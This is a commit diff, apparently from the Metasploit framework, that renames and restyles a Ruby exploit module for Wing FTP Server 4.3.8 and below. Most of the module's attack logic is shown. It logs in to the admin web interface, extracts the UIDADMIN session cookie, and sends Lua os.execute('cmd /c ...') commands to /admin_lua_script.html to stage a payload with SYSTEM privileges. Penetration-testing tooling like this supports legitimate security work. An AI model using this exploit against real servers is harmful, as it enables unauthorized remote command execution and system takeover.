Rename and apply rubocop style to wing_ftp_admin_exec

zeroSteiner · zeroSteiner · commit 8095b4893c61 · 2014-08-29T13:42:11.000-04:00
diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb
@@ -11,16 +11,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wing FTP Server Remote Command Execution',
+      'Name'           => 'Wing FTP Server Authenticated Command Execution',
       'Description'    => %q{
-        This module exploits the embedded Lua interpreter in the admin interface for
+        This module exploits the embedded Lua interpreter in the admin web interface for
         versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
         an attacker can use os.execute() to execute arbitrary system commands on
         the target with SYSTEM privileges.
       },
       'Author'         =>
         [
-          'Nicholas Nam <nick[at]executionflow.org>',
+          'Nicholas Nam <nick[at]executionflow.org>'
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -57,13 +57,13 @@ def check
 
     if !res
       fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code != 200 
+    elsif res.code != 200
       fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
-    elsif res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
+    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
       return Exploit::CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -73,27 +73,27 @@ def exploit
 
     print_status("#{peer} - Sending payload")
     # Execute the cmdstager, max length of the commands is ~1500
-    execute_cmdstager({:flavor => :vbs, :linemax => 1500})
+    execute_cmdstager(flavor: :vbs, linemax: 1500)
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     command = "os.execute('cmd /c #{cmd}')"
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'       => '/admin_lua_script.html',
       'method'    => 'POST',
       'cookie'    => @session_cookie,
       'vars_post' => { 'command' => command }
-    })
+    )
 
-    if res and res.code != 200
+    if res && res.code != 200
       fail_with(Failure::Unkown, "#{peer} - Something went wrong.")
     end
   end
 
   def authenticate(username, password)
     print_status("#{peer} - Authenticating")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'       => '/admin_loginok.html',
       'method'    => 'POST',
       'vars_post' => {
@@ -103,25 +103,21 @@ def authenticate(username, password)
         'password_val' => password,
         'submit_btn'   => '+Login+'
       }
-    })
+    )
 
     uidadmin = ''
-    if !res 
+    if !res
       fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code == 200 and res.body =~ /location='main.html\?lang=english';/
+    elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
       res.get_cookies.split(';').each do |cookie|
         cookie.split(',').each do |value|
-          if value.split('=')[0] =~ /UIDADMIN/
-            uidadmin = value.split('=')[1]
-          end
+          uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
         end
       end
     else
       fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
-    return "UIDADMIN=#{uidadmin}"
+    "UIDADMIN=#{uidadmin}"
   end
-
 end
-
